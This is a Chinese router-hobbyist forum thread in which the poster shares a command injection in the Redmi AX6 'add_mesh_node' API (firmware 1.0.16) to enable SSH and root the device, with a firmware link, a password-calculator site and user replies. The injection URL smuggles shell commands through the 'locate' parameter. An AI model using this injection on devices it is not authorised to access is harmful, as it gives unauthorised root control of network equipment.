QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[红米AX6] 方便的AX6获取SSH方法【原创】

昨天想给朋友的AX6的路由刷机,但发现之前的SSH方法都要有别一台路由配合,没有这条件。

花了一些时间挖了一个方便一点注入漏洞。
最新的固件已经修复了这个方法。
我是降级到1.0.16操作的。
  1. https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra69/miwifi_ra69_firmware_a7244_1.0.16.bin
复制代码

改成自己的stok,下面命令只是开启了ssh,密码自己算或者自己用注入改。
  1. http://192.168.31.1/cgi-bin/luci/;stok=878d0c7fa9e5f45eb0ab500efe24d255/api/xqnetwork/add_mesh_node?mac=aa&locate=a;%20nvram%20set%20ssh_en=1;%20nvram%20commit;%20sed%20-i%20%27s/channel=.*/channel=\%22debug\%22/g%27%20/etc/init.d/dropbear;%20/etc/init.d/dropbear%20start;
复制代码

原来的脚本貌似多了一个空格。
感谢 qeer1986配合调试,已经修复了,应该现在是可以的。

评分

lrii*** + 2 赞!

楼主威武

来自手机 | 显示全部楼层
楼主?逼plus

就一行代码就完事了?楼主牛啊

帮顶!虽然我AX6被我刷成真砖了!
stok”需要改成自己的吗?

楼主| | 显示全部楼层
要改成自己的stok,发的时候写了,发出去就没了。

楼主有没有具体教程 可以发下吗 谢谢了 首发就买了 一直不会刷

返回了code0但是路由器密码没改,而且依然进不去ssh

CJ4801 发表于 2023-6-18 16:16
返回了code0但是路由器密码没改,而且依然进不去ssh

用ssh连,提示能链接到ssh就是成功了,密码自己用S/N算,或者自己用注入命令改。
算密码的网站。
  1. https://mi.sosloli.com/
复制代码

smtking 发表于 2023-6-18 16:50
用ssh连,提示能链接到ssh就是成功了,密码自己用S/N算,或者自己用注入命令改。
算密码的网站。
...

那我的应该是失败了,不知道为什么。老哥能随便给点思路吗?

或许你可以试试wr30u的那个方法,那个估计也可以

CJ4801 发表于 2023-6-18 18:08
那我的应该是失败了,不知道为什么。老哥能随便给点思路吗?

降级固件,最新的固件不行了。

smtking 发表于 2023-6-18 20:47
降级固件,最新的固件不行了。

哥,已经降级到1.0.16,替换了stock,结果code 0,ssh失败,把Mac也修改了,还是失败,问题出在哪里呢?

来自手机 | 显示全部楼层
楼主厉害,今晚回去翻出吃灰的ax6试试。之前的方法麻烦,虽然另有一台op的路由器,但还是不愿意折腾,楼主这方法简单就想试下。

不行呢,返回{"code":0}但是SSH连不上.替换了stock,版本已降级1.0.16